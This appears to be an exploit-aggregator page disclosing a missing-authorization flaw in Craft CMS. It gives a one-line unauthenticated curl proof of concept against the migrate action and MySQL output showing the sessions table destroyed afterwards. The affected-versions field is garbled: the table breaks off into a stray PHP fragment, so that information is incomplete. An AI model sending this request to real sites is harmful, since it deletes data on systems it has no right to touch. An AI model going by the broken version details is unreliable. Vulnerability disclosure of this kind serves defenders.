Share
## https://sploitus.com/exploit?id=245059C6-CEB0-59F3-948A-797FCD1E8BD6
# CVE-2026-31266 - Craft CMS Missing Authorization

## CVE Information
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-31266 |
| **Vendor** | Pixel & Tonic |
| **Product** | Craft CMS |
| **Affected Versions** |  self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];
```

## Proof of Concept

```bash
# With allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"
```

## Evidence

### Before Attack:
```sql
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+
```

### After Attack:
```sql
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist
```

## References
- [Craft CMS Repository](https://github.com/craftcms/cms)
- [Craft Security Documentation](https://craftcms.com/knowledge-base/securing-craft)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2026-31266) *(pending)*

## Contact
- **Security Researcher:** 0xRIXET
- **Twitter | X :** @0xRIXET
- **Email:** 0xrixet@gmail.com